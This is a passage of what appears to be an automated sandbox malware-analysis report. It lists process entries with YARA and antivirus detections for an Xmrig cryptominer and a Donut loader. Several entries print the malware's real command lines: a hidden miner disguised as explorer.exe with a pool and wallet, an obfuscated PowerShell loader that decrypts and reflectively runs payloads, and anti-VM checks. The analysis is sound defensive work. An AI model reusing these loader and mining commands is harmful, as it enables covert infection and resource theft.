                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:30
                                                                                                                                                        Start time:18:24:07
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:31
                                                                                                                                                        Start time:18:24:08
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:31'232 bytes
                                                                                                                                                        MD5 hash:61D09675A406E39F17F2EA03A3CB8CCC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:34
                                                                                                                                                        Start time:18:24:09
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
                                                                                                                                                        Imagebase:0x7ff6b20d0000
                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:36
                                                                                                                                                        Start time:18:24:12
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:37
                                                                                                                                                        Start time:18:24:12
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
                                                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:38
                                                                                                                                                        Start time:18:24:13
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:39
                                                                                                                                                        Start time:18:24:13
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:40
                                                                                                                                                        Start time:18:24:20
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:41
                                                                                                                                                        Start time:18:24:20
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:42
                                                                                                                                                        Start time:18:24:20
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:43
                                                                                                                                                        Start time:18:24:20
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:44
                                                                                                                                                        Start time:18:24:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:45
                                                                                                                                                        Start time:18:24:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:46
                                                                                                                                                        Start time:18:24:23
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff67a220000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:47
                                                                                                                                                        Start time:18:24:23
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff71fdd0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:48
                                                                                                                                                        Start time:18:24:42
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:49
                                                                                                                                                        Start time:18:24:42
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:50
                                                                                                                                                        Start time:18:24:52
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                                                                                                                        Imagebase:0x7ff78bc90000
                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:51
                                                                                                                                                        Start time:18:24:52
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:52
                                                                                                                                                        Start time:18:24:52
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
